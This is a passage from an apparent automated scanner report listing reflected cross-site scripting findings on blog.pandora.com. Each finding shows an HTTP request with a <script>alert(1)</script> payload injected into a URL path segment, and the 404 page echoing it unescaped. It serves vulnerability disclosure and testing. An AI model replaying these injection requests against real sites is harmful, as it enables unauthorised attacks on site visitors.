Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47765<script>alert(1)</script>7bc942491d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8006b<script>alert(1)</script>683adabb342 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa7d3<script>alert(1)</script>e86910f5065 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33c8f<script>alert(1)</script>e3aabb416ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f087<script>alert(1)</script>fe8192ca492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3dbfc<script>alert(1)</script>cae8c69d562 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c455f<script>alert(1)</script>b6d36241d5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd617<script>alert(1)</script>7f88e7ca374 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec7f7<script>alert(1)</script>d0c5fa2a196 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23e21<script>alert(1)</script>f8392586fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1665f<script>alert(1)</script>f197cc616af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e163<script>alert(1)</script>746a263de0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27be<script>alert(1)</script>78a1bab0ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3449<script>alert(1)</script>fffe6e73560 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41581<script>alert(1)</script>c6f00e54db1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc284<script>alert(1)</script>5ac9a5cf490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29463<script>alert(1)</script>88dd0003541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 826cd<script>alert(1)</script>9d679957bf3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7029<script>alert(1)</script>c9c50ef33cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

